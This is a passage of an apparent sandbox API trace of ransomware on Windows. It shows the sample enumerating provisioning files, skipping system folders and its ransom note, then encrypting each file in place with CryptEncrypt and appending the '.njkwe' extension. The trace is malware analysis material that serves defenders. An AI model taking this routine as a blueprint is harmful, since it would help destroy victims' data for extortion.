(lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.349] lstrcmpiW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.349] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml") returned 163 [0077.349] StrStrIW (lpFirst="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.349] lstrcmpW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.349] lstrcmpW (lpString1="214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.349] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.349] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\214__connections_cellular_vodafone it (italy)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.350] GetTickCount () returned 0x1153ac3 [0077.350] GetTickCount () returned 0x1153ac3 [0077.350] GetTickCount () returned 0x1153ac3 [0077.350] GetTickCount () returned 0x1153ac3 [0077.350] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.350] GetProcessHeap () returned 0xbe0000 [0077.350] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.350] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.351] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.351] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cd, lpOverlapped=0x0) returned 1 [0077.351] GetProcessHeap () returned 0xbe0000 [0077.351] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.351] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.352] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.352] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.352] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.352] CloseHandle (hObject=0x43c) returned 1 [0077.352] GetProcessHeap () returned 0xbe0000 [0077.352] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.352] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\214__connections_cellular_vodafone it (italy)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\214__Connections_Cellular_Vodafone IT (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\214__connections_cellular_vodafone it (italy)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.353] GetProcessHeap () returned 0xbe0000 [0077.353] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.353] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907f1b04, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907f1b04, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907f1b04, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="215__C~1.PRO")) returned 1 [0077.353] lstrcmpiW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.353] lstrcmpiW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.353] lstrcmpiW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.353] lstrcmpiW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.353] lstrcmpiW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.353] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.353] StrStrIW (lpFirst="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.353] lstrcmpW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.353] lstrcmpW (lpString1="215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.353] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.353] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\215__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.353] GetTickCount () returned 0x1153ac3 [0077.353] GetTickCount () returned 0x1153ac3 [0077.354] GetTickCount () returned 0x1153ac3 [0077.354] GetTickCount () returned 0x1153ac3 [0077.354] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.354] GetProcessHeap () returned 0xbe0000 [0077.354] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.354] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.355] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.355] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.355] GetProcessHeap () returned 0xbe0000 [0077.355] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.355] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.355] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.355] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.356] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.356] CloseHandle (hObject=0x43c) returned 1 [0077.356] GetProcessHeap () returned 0xbe0000 [0077.356] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.356] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.356] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\215__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\215__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\215__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.356] GetProcessHeap () returned 0xbe0000 [0077.356] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.356] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907f1b04, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907f1b04, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907f1b04, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", cAlternateFileName="216__C~1.PRO")) returned 1 [0077.356] lstrcmpiW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.357] lstrcmpiW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.357] lstrcmpiW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.357] lstrcmpiW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.357] lstrcmpiW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.357] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml") returned 156 [0077.357] StrStrIW (lpFirst="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.357] lstrcmpW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.357] lstrcmpW (lpString1="216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.357] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\216__connections_cellular_wind (italy)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.357] GetTickCount () returned 0x1153ac3 [0077.357] GetTickCount () returned 0x1153ac3 [0077.357] GetTickCount () returned 0x1153ac3 [0077.357] GetTickCount () returned 0x1153ac3 [0077.357] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.357] GetProcessHeap () returned 0xbe0000 [0077.357] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.357] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.367] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.367] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.368] GetProcessHeap () returned 0xbe0000 [0077.368] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.368] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.368] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.368] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.368] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.368] CloseHandle (hObject=0x43c) returned 1 [0077.368] GetProcessHeap () returned 0xbe0000 [0077.368] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.368] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0077.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\216__connections_cellular_wind (italy)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\216__Connections_Cellular_Wind (Italy)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\216__connections_cellular_wind (italy)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.369] GetProcessHeap () returned 0xbe0000 [0077.369] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.369] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907f1b04, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907f1b04, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907f1b04, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", cAlternateFileName="217__C~1.PRO")) returned 1 [0077.369] lstrcmpiW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.369] lstrcmpiW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.369] lstrcmpiW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.369] lstrcmpiW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.369] lstrcmpiW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.369] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml") returned 156 [0077.369] StrStrIW (lpFirst="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.369] lstrcmpW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.369] lstrcmpW (lpString1="217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.369] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.369] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\217__connections_cellular_wind (italy)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.370] GetTickCount () returned 0x1153ad3 [0077.370] GetTickCount () returned 0x1153ad3 [0077.370] GetTickCount () returned 0x1153ad3 [0077.370] GetTickCount () returned 0x1153ad3 [0077.370] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.370] GetProcessHeap () returned 0xbe0000 [0077.370] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.370] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0077.387] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.387] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0077.387] GetProcessHeap () returned 0xbe0000 [0077.387] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.387] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.388] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.388] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.388] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.388] CloseHandle (hObject=0x43c) returned 1 [0077.388] GetProcessHeap () returned 0xbe0000 [0077.388] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.388] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0077.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\217__connections_cellular_wind (italy)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\217__Connections_Cellular_Wind (Italy)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\217__connections_cellular_wind (italy)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.389] GetProcessHeap () returned 0xbe0000 [0077.389] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.389] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90817d73, 